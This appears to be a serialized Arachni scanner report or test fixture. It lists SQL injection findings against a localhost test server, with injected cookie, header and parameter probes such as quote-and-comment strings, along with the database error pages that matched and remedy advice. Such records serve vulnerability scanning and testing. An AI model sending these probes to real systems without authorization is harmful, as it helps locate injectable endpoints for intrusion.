:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default)
:follow_location: true
:injected: default)
:combo:
!binary "aW5wdXQ=": default)
:action: http://localhost:7362/mssql/link/append?input=default
:verification:
:id: System.Data.OleDb.OleDbException
var: input
url: http://localhost:7362/mssql/link/append?input=default
injected: default)
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: link
remarks: {}
method: GET
response: ! 'System.Data.OleDb.OleDbException
[Microsoft][ODBC SQL Server Driver]
[SQLServer JDBC Driver]
[SqlException
System.Data.SqlClient.SqlException
Unclosed quotation mark after the character string
''80040e14''
mssql_query()
Microsoft OLE DB Provider for ODBC Drivers
Microsoft OLE DB Provider for SQL Server
Incorrect syntax near
Sintaxis incorrecta cerca de
Syntax error in string in query expression
Procedure or function ''ColumnSeek'' expects parameter
Unclosed quotation mark before the character string
Syntax Error (missing operator) in query expression
Data type mismatch in criteria expression
ADODB.Field (0x800A0BCD)
[Microsoft][ODBC Microsoft Access Driver]
the used select statements have different number of columns
OLE DB stuff SQL Server
Warningstuff mssql_
Access stuff Driver
Driver stuff Access
JET Database Engine
Access Database Engine
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODQ5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mssql/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mssql/link/flip?input=default
:verification:
:id: System.Data.OleDb.OleDbException
var: Parameter flip
url: http://localhost:7362/mssql/link/flip?input=default
injected: ''
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: link
remarks: {}
method: GET
response: ! '["System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server Driver]\n[SQLServer
JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed quotation
mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft OLE
DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect
syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure
or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before
the character string\nSyntax Error (missing operator) in query expression\nData
type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC
Microsoft Access Driver]\nthe used select statements have different number of
columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver
stuff Access\nJET Database Engine\nAccess Database Engine\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODg0
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/mssql/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value'`--
:injected: cookie value'`--
:combo:
!binary "Y29va2llMg==": cookie value'`--
:action: http://localhost:7362/mssql/cookie/append
:verification:
:id: System.Data.OleDb.OleDbException
var: cookie2
url: http://localhost:7362/mssql/cookie/append
injected: cookie value'`--
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: cookie
remarks: {}
method: GET
response: ! 'System.Data.OleDb.OleDbException
[Microsoft][ODBC SQL Server Driver]
[SQLServer JDBC Driver]
[SqlException
System.Data.SqlClient.SqlException
Unclosed quotation mark after the character string
''80040e14''
mssql_query()
Microsoft OLE DB Provider for ODBC Drivers
Microsoft OLE DB Provider for SQL Server
Incorrect syntax near
Sintaxis incorrecta cerca de
Syntax error in string in query expression
Procedure or function ''ColumnSeek'' expects parameter
Unclosed quotation mark before the character string
Syntax Error (missing operator) in query expression
Data type mismatch in criteria expression
ADODB.Field (0x800A0BCD)
[Microsoft][ODBC Microsoft Access Driver]
the used select statements have different number of columns
OLE DB stuff SQL Server
Warningstuff mssql_
Access stuff Driver
Driver stuff Access
JET Database Engine
Access Database Engine
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value'`--
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODQ5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mssql/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mssql/cookie/flip
:verification:
:id: System.Data.OleDb.OleDbException
var: Parameter flip
url: http://localhost:7362/mssql/cookie/flip
injected: ''
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server
Driver]\n[SQLServer JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed
quotation mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft
OLE DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect
syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure
or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before
the character string\nSyntax Error (missing operator) in query expression\nData
type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC
Microsoft Access Driver]\nthe used select statements have different number of
columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver
stuff Access\nJET Database Engine\nAccess Database Engine\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODg0
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mssql/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mssql/header/flip
:verification:
:id: System.Data.OleDb.OleDbException
var: Parameter flip
url: http://localhost:7362/mssql/header/flip
injected: ''
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server
Driver]\n[SQLServer JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed
quotation mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft
OLE DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect
syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure
or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before
the character string\nSyntax Error (missing operator) in query expression\nData
type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC
Microsoft Access Driver]\nthe used select statements have different number of
columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver
stuff Access\nJET Database Engine\nAccess Database Engine\n", nil, nil, nil,
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTAyOQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoxNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/mssql/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/mssql/header/append
:verification:
:id: System.Data.OleDb.OleDbException
var: User-Agent
url: http://localhost:7362/mssql/header/append
injected: arachni_user'`--
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: header
remarks: {}
method: GET
response: ! 'System.Data.OleDb.OleDbException
[Microsoft][ODBC SQL Server Driver]
[SQLServer JDBC Driver]
[SqlException
System.Data.SqlClient.SqlException
Unclosed quotation mark after the character string
''80040e14''
mssql_query()
Microsoft OLE DB Provider for ODBC Drivers
Microsoft OLE DB Provider for SQL Server
Incorrect syntax near
Sintaxis incorrecta cerca de
Syntax error in string in query expression
Procedure or function ''ColumnSeek'' expects parameter
Unclosed quotation mark before the character string
Syntax Error (missing operator) in query expression
Data type mismatch in criteria expression
ADODB.Field (0x800A0BCD)
[Microsoft][ODBC Microsoft Access Driver]
the used select statements have different number of columns
OLE DB stuff SQL Server
Warningstuff mssql_
Access stuff Driver
Driver stuff Access
JET Database Engine
Access Database Engine
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODQ5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoxOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/emc/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/emc/form/flip
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: Parameter flip
url: http://localhost:7362/emc/form/flip
injected: ''
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: form
remarks: {}
method: GET
response: ! '["[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
